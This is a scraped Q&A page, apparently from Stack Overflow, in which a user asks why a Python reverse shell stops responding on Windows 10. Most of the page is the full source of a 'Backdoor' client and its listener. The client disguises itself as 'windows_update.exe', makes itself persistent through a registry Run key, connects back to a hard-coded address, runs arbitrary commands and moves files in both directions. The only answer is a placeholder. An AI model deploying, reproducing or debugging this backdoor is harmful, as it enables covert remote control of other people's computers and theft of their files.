reverse shell on windows 10 x64 based pure python code crashed instantly when executing command

Question

This is working in linux, I am able to execute any command and all is fine.

In windows (tried in 2 machines) I get the shell, but once I am trying to to type any command, it is just stuck and nothing happens. Even in simple netcat or metasploit I wasn't able to get any shell, even when disable any security on it.

But in this case I do get shell, but when typing the first command - it is just stuck, and nothing happens. The same code is working great on linux though.

this is my code :

client -

#!/usr/bin/env python
import socket
import subprocess
import json
import os
import base64
import sys
import shutil

class Backdoor:
    def __init__(self, ip, port):
        self.become_presistent()
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((ip, port))

    def become_presistent(self):
        evil_file_location = os.environ["appdata"] + "\windows_update.exe"
        if not os.path.exists(evil_file_location):
            shutil.copyfile(sys.executable, evil_file_location)
            subprocess.call('reg add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v update /t REG_SZ /d "' + evil_file_location + '"', shell=True)

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_receive(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + str(self.connection.recv(1024))
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_system_command(self, command):

        return subprocess.check_output(command, shell=True, stderr=subprocess.DEVNULL)

    def chaning_working_directory_to(self, path):
        os.chdir(path)
        return "[+] chaning directory to " + path

    def read_file(self, path):
        with open(path, "rb") as file:
            return base64.b64encode(file.read())

    def write_file(self, path, content):
        with open(path, "wb") as file:
            file.write(base64.b64decode(content))
            return "[+] download successful."

    def run(self):
        while True:
            command = self.reliable_receive()
            try:
                if command[0] == "exit":
                    self.connection.close()
                    sys.exit()
                elif command[0] == "cd" and len(command) > 1:
                    command_result = self.chaning_working_directory_to(command[1])
                elif command[0] == "download":
                    command_result = self.read_file(command[1])
                elif command[0] == "upload":
                    command_result = self.write_file(command[1], command[2])
                else:
                    command_result = self.execute_system_command(command)
            except Exception:
                command_result = "[-] error during command execution"

            self.reliable_send(command_result)
try:
    my_backdoor = Backdoor("192.168.14.56", 4444)
    my_backdoor.run()
except Exception:
    sys.exit()

server =

#!/usr/bin/python
import socket, json, base64

class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((ip, port))
        listener.listen(0)
        print("[+] waiting for connection")
        self.connection, address = listener.accept()
        print("[+] got a connectoon from " + str(address))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_receive(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + str(self.connection.recv(1024))
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_remotely(self, command):
        self.reliable_send(command)

        if command[0] == "exit":
            self.connection.close()
            exit()

        return self.reliable_receive()

    def write_file(self, path, content):
        with open(path, "wb") as file:
            file.write(base64.b64decode(content))
            return "[+] download successful."

    def read_file(self, path):
        with open(path, "rb") as file:
            return base64.b64encode(file.read())

    def run(self):
        while True:
            command = raw_input(">> ")
            command = command.split(" ")
            try:

                if command[0] == "upload":
                    file_content = self.read_file(command[1])
                    command.append(file_content)

                result = self.execute_remotely(command)

                if command[0] == "download" and "[-] Error " not in result:
                    result = self.write_file(command[1], result)
            except Exception:
                result = "[-] Error during command"

            print (result)

my_listener = Listener("192.168.14.101", 4444)
my_listener.run()

the output i get -

[+] waiting for connection
[+] got a connectoon from ('192.168.14.101', 63817)
>> ls
^CTraceback (most recent call last):
  File "listener.py", line 65, in <module>
    my_listener.run()
  File "listener.py", line 55, in run
    result = self.execute_remotely(command)
  File "listener.py", line 34, in execute_remotely
    return self.reliable_receive()
  File "listener.py", line 22, in reliable_receive
    json_data = json_data + self.connection.recv(1024)
KeyboardInterrupt

question from:https://stackoverflow.com/questions/65947331/reverse-shell-on-windows-10-x64-based-pure-python-code-crashed-instantly-when-ex

Answer 1

Waitting for answers